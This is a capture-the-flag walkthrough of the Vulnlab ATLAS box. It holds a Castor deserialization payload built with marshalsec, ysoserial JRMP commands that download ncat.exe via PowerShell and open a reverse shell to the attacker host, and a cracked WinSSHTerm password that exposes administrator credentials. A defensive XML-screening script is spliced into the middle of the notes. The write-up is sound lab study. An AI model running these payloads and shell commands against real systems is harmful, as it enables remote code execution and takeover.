Here are my notes on the ATLAS box from Vulnlab, which was deployed to Hackthebox.
ATLAS: 10.10.118.2
PORT STATE SERVICE VERSION
21/tcp open ftp?
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 22851463 Jul 03 2023 atlas-pilot-1.0.0-SNAPSHOT.jar #jd-gui
|_-r--r--r-- 1 ftp ftp 586379 Jul 03 2023 atlas_generator.zip
| ssl-cert: Subject: commonName=filezilla-server self signed certificate
| Not valid before: 2023-06-30T15:35:45
|_Not valid after: 2024-06-30T15:40:45
|_ssl-date: TLS randomness does not represent time
#Nothing interesting or exploitable in pom.xml from atlas_generator.zip
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 4bf3652272c43ad27daf8fb1359679ae (RSA)
| 256 dfd563880957cd4e7b905b4646034213 (ECDSA)
|_ 256 a974d9783fbd7c398ca62aa1fb1236ba (ED25519)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ATLAS
| Not valid before: 2024-11-24T01:01:59
|_Not valid after: 2025-05-26T01:01:59
|_ssl-date: 2024-11-25T01:21:34+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: ATLAS
| NetBIOS_Domain_Name: ATLAS
| NetBIOS_Computer_Name: ATLAS
| DNS_Domain_Name: ATLAS
| DNS_Computer_Name: ATLAS
| Product_Version: 10.0.19041
|_ System_Time: 2024-11-25T01:20:33+00:00
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-GB
| Date: Mon, 25 Nov 2024 01:28:45 GMT
| Connection: close
| <html>
| <head>
| <style>
| body {
| background-image: url(./59f86e9a43e6f89908a4f0b948915bef.png);
| background-repeat: no-repeat;
| background-position-x: right;
| background-position-y: bottom;
| background-size: 50%;
| display: block;
#Not vulnerable to XXE: the Castor library is up to date (version 1.4.1, per pom.xml).
XML with employee data:
Profile
Skills
Technical
Education
#NOPE, not vulnerable to XXE.
Source Code Review:
Java:
pom.xml
Read the source files that are relevant to the main functionality of the website.
If those files call into other files, follow the chain until you find the vulnerable part of the code.
If not, move on to a different part of the source code or think outside the box.
FileUploadController.java: #From Atlas_Generator.zip
[SNIP]
    @GetMapping("/generateTemplate")
    public String writeMarshall(Model model) throws IOException {
        model.addAttribute("message", Client.createXML());
        return "xmlTemplate";
    }
[SNIP]
/generateTemplate generates a sample template file and places it on the FTP service.
We are going to use this for our exploit.
/generateTemplate calls into the Client.java script.
Client.java:
import java.io.FileWriter;
import java.io.IOException;
import org.exolab.castor.xml.Unmarshaller;
import org.exolab.castor.xml.Marshaller;
import org.exolab.castor.mapping.Mapping;
import org.exolab.castor.mapping.MappingException;

public class Client {
    public static String createXML() throws IOException {
        try {
            // Marshal a sample Employee to employee_template.xml (served over FTP)
            FileWriter fileWriter = new FileWriter("employee_template.xml");
            Marshaller marshaller = new Marshaller(fileWriter);
            // Mapping: loaded from the application's own mapping.xml
            Mapping mapping = new Mapping();
            mapping.loadMapping("http://127.0.0.1:8080/mapping.xml");
            marshaller.setMapping(mapping);
            Employee employee = new Employee();
            employee.setId(101);
            employee.setName("Jonathan Doe");
            employee.setTitle("ROCKET TESTER, PILOT");
            employee.setEmail("jonathan@starfield.com");
            employee.setPhone("(313) - 867-5309");
[SNIP]
So it uses Castor's Marshaller and Unmarshaller to generate and accept the XML file.
It's vulnerable to the Java Unmarshaller exploit:
https://github.com/mbechler/marshalsec
mvn clean package -DskipTests
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor ldap://10.8.0.71:1389/a
This gives us a payload:
<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://10.8.0.71:1389/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://10.8.0.71:1389/a</shareable-resource></bean-factory></x>
Then start an LDAP listener for it:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.0.71:8888/#Exploit"
Now add that payload to employee_template.xml:
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/FTP]
└─# cat employee_template.xml
<?xml version="1.0" encoding="UTF-8"?>
<Employee id="101"><name xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://10.8.0.71:1389/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://10.8.0.71:1389/a</shareable-resource></bean-factory></name><talent-titles>Navigation</talent-titles><talent-titles>Warp Engine</talent-titles><talent-titles>Project Direction</talent-titles><talent-textes>Assertively exploit wireless initiatives rather than synergistic core competencies.</talent-textes><talent-textes>Credibly streamline mission-critical value with multifunctional functionalities.</talent-textes><talent-textes>Proven ability to lead and manage a wide variety of design and development projects in team and independent situations.</talent-textes><skills>Mining</skills><skills>Ship Building</skills><skills>Gravity Science</skills><skills>Alien Communication</skills><skills>Planetology</skills><skills>Zero Trust Tools</skills><skills>Satellite Engineering</skills><skills>Rocket Science</skills><skills>Moon Walks</skills><profile>Progressively evolve cross-platform ideas before impactful infomediaries. Energistically visualize tactical initiatives before cross-media catalysts for change.</profile><phone>(313) - 867-5309</phone><email>jonathan@starfield.com</email><education-text>Dual Major, Robotics and Starships - 4.0 GPA</education-text><education-title>NASA University - Bloomington, Indiana</education-title><title>ROCKET TESTER, PILOT</title></Employee>
-Just rename the <x></x> element to <name></name>.
Upload the malicious employee_template file and the exploit should work:
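From the defender's side, the malicious template above is easy to tell apart from the legitimate one: the data binder only needs plain field values, so an element carrying xsi:type="java:..." (which asks Castor to instantiate that class) or a JNDI URI (ldap://, rmi://) has no business in an employee record. The following is an added example, not code from the original notes or from the Atlas application: a pre-unmarshal screening step in Python that rejects such uploads. The sample documents are constructed from the payload structure shown in the notes, with a placeholder host instead of a real address; the function names are my own.

```python
"""Screen an uploaded Castor-style XML document before it is unmarshalled.

Added example (not part of the original notes or the Atlas app). Flags:
  1. any xsi:type attribute whose value names a Java class ("java:..."),
  2. any JNDI URI (ldap://, rmi://, ...) in element text or attributes.
"""
import re
import xml.etree.ElementTree as ET

XSI_NS = "http://www.w3.org/2001/XMLSchema-instance"
XSI_TYPE = f"{{{XSI_NS}}}type"  # ElementTree's Clark notation for xsi:type

# Schemes a JNDI lookup (e.g. via SimpleJndiBeanFactory) would dereference.
JNDI_URI = re.compile(r"\b(?:ldap|ldaps|rmi|iiop|dns|corba)://", re.IGNORECASE)


def _local(tag: str) -> str:
    """Strip the namespace from a Clark-notation tag: {ns}name -> name."""
    return tag.split("}", 1)[-1]


def screen_xml(document: str) -> list:
    """Return a list of human-readable findings; an empty list means clean."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]

    findings = []
    for elem in root.iter():
        # 1. xsi:type="java:<class>" lets the binder instantiate that class.
        xsi_type = elem.attrib.get(XSI_TYPE)
        if xsi_type and xsi_type.lower().startswith("java:"):
            findings.append(f"<{_local(elem.tag)}> xsi:type names a class: {xsi_type[5:]}")
        # 2. JNDI URIs point the unmarshalled object at a remote naming service.
        for value in [elem.text or ""] + list(elem.attrib.values()):
            if JNDI_URI.search(value):
                findings.append(f"<{_local(elem.tag)}> contains a JNDI URI: {value.strip()}")
    return findings


def is_safe_upload(document: str) -> bool:
    """Accept the document only if screening produced no findings."""
    return not screen_xml(document)


# Constructed sample: the shape of a legitimate employee_template.xml.
BENIGN = (
    '<Employee id="101"><name>Jonathan Doe</name><skills>Mining</skills>'
    "<email>jonathan@starfield.com</email><title>ROCKET TESTER, PILOT</title></Employee>"
)

# Constructed sample: the structure of the injected <name> element from the
# notes, with a placeholder host (attacker.example) instead of a real address.
MALICIOUS = (
    '<Employee id="101"><name xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    'xmlns:java="http://java.sun.com" '
    'xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean">'
    "<target-bean-name>rmi://attacker.example/a</target-bean-name>"
    "<property-path>foo</property-path>"
    '<bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory">'
    "<shareable-resource>rmi://attacker.example/a</shareable-resource>"
    "</bean-factory></name><title>ROCKET TESTER, PILOT</title></Employee>"
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, "->", "accept" if is_safe_upload(doc) else "reject")
        for finding in screen_xml(doc):
            print("   ", finding)
```

The check is deliberately coarse: a binder that maps fixed Java fields never needs the client to choose the class, so any xsi:type that names a class is grounds for rejection rather than for allow-listing. Run it before the file reaches Castor, and log the findings so the upload attempt is visible in SOC tooling.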
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/marshalsec]
└─# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.0.71:8888/#Exploit"
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.8.0.71:8888/Exploit.class
#It works !
Convert this SSRF into RCE via RMI: #ysoserial
-Requires Java 11:
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# sudo update-alternatives --config java
There are 2 choices for the alternative java (providing /usr/bin/java).
Selection Path Priority Status
------------------------------------------------------------
0 /usr/lib/jvm/java-17-openjdk-amd64/bin/java 1711 auto mode
* 1 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111 manual mode
2 /usr/lib/jvm/java-17-openjdk-amd64/bin/java 1711 manual mode
Press <enter> to keep the current choice[*], or type selection number: 1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 192.168.178.22'
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'wget http://10.8.0.71'
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'wget 10.8.0.71'
* Opening JRMP listener on 1099
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 10.8.0.71'
* Opening JRMP listener on 1099
Then create a payload with marshalsec that points directly at the RMI service port:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor rmi://10.8.0.71/a
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor rmi://10.8.0.71/a
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/marshalsec]
└─# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor rmi://10.8.0.71/a
<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.8.0.71/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.8.0.71/a</shareable-resource></bean-factory></x>
<name xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.8.0.71/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.8.0.71/a</shareable-resource></bean-factory></name>
Now add that to employee_template.xml like last time:
Malicious employee_template.xml:
<?xml version="1.0" encoding="UTF-8"?>
<Employee id="101"><name xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.8.0.71/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.8.0.71/a</shareable-resource></bean-factory></name><talent-titles>Navigation</talent-titles><talent-titles>Warp Engine</talent-titles><talent-titles>Project Direction</talent-titles><talent-textes>Assertively exploit wireless initiatives rather than synergistic core competencies.</talent-textes><talent-textes>Credibly streamline mission-critical value with multifunctional functionalities.</talent-textes><talent-textes>Proven ability to lead and manage a wide variety of design and development projects in team and independent situations.</talent-textes><skills>Mining</skills><skills>Ship Building</skills><skills>Gravity Science</skills><skills>Alien Communication</skills><skills>Planetology</skills><skills>Zero Trust Tools</skills><skills>Satellite Engineering</skills><skills>Rocket Science</skills><skills>Moon Walks</skills><profile>Progressively evolve cross-platform ideas before impactful infomediaries. Energistically visualize tactical initiatives before cross-media catalysts for change.</profile><phone>(313) - 867-5309</phone><email>jonathan@starfield.com</email><education-text>Dual Major, Robotics and Starships - 4.0 GPA</education-text><education-title>NASA University - Bloomington, Indiana</education-title><title>ROCKET TESTER, PILOT</title></Employee>
Upload it and the target will ping back to Kali, as long as the ysoserial JRMP listener is running:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 10.8.0.71'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50594
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:59:25.574116 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 1, length 40
11:59:25.574473 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 1, length 40
11:59:26.564221 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 2, length 40
11:59:26.564366 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 2, length 40
11:59:27.576485 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 3, length 40
11:59:27.576557 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 3, length 40
11:59:28.608671 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 4, length 40
11:59:28.608704 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 4, length 40
Windows Target: #Example
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'powershell.exe -c "wget http://10.8.0.71/"'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50648
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/FTP]
└─# sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.79.140 - - [26/Nov/2024 12:02:55] "GET / HTTP/1.1" 200 -
#IT WORKS !
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'powershell.exe -c "wget http://10.8.0.71/ncat.exe -O C:\Users\Public\ncat.exe"'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50713
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
^C
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'C:\Users\Public\ncat.exe -nv 10.8.0.71 1234 -e CMD'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50729
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/FTP]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.79.140] 50730
Microsoft Windows [Version 10.0.19045.3086]
(c) Microsoft Corporation. All rights reserved.
C:\ftp>
C:\ftp>whoami
whoami
atlas\john
C:\ftp>hostname
hostname
ATLAS
USER-SHELL !
https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FAtlas%2FWriteup#Source_Code_Analysis
C:\Users\John\Desktop>whoami
whoami
atlas\john
C:\Users\John\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\John\Desktop
03/07/2023 10:49 <DIR> .
03/07/2023 10:49 <DIR> ..
03/07/2023 10:48 36 user.txt
1 File(s) 36 bytes
2 Dir(s) 5,844,897,792 bytes free
C:\Users\John\Desktop>type user.txt
type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
C:\Users\John\Downloads\WinSSHTerm>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\John\Downloads\WinSSHTerm
30/06/2023 19:48 <DIR> .
30/06/2023 19:48 <DIR> ..
30/06/2023 19:48 <DIR> config
28/06/2023 13:20 1,745 README.txt
30/06/2023 19:48 <DIR> tools
28/06/2023 13:20 3,115,752 WinSSHTerm.exe
2 File(s) 3,117,497 bytes
4 Dir(s) 5,846,638,592 bytes free
C:\Users\John\Downloads\WinSSHTerm>cd config
cd config
C:\Users\John\Downloads\WinSSHTerm\config>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\John\Downloads\WinSSHTerm\config
30/06/2023 19:48 <DIR> .
30/06/2023 19:48 <DIR> ..
30/06/2023 21:20 676 connections.xml
28/06/2023 16:37 113 key
30/06/2023 21:20 3,620 layout.xml
28/06/2023 16:37 8,952 preferences.xml
4 File(s) 13,361 bytes
2 Dir(s) 5,846,638,592 bytes free
WinSSH Password Crack:
https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FAtlas%2FWriteup#Priv._Esc_-_WinSSHTerm
┌──(root㉿kali)-[/home/kali/VL/ATLAS/10.10.118.2]
└─# python3 bruteforce.py
6%|██████▎ | 3338/59187 [00:12<03:00, 308.88it/s]
Found password: hottie101
Run WinSSHTerm.exe with the cracked password to reveal the administrator password.
hottie101
administrator:lzm2wx3Fn7q7gBLDRuf4
administrator@ATLAS C:\Users\Administrator>whoami
atlas\administrator
administrator@ATLAS C:\Users\Administrator>hostname
ATLAS
Administrator SHELL !
administrator@ATLAS C:\Users\Administrator\Desktop>whoami
atlas\administrator
administrator@ATLAS C:\Users\Administrator\Desktop>hostname
ATLAS
administrator@ATLAS C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\Administrator\Desktop
03/07/2023 10:49 <DIR> .
03/07/2023 10:49 <DIR> ..
03/07/2023 10:47 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 5,846,540,288 bytes free
administrator@ATLAS C:\Users\Administrator\Desktop>type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
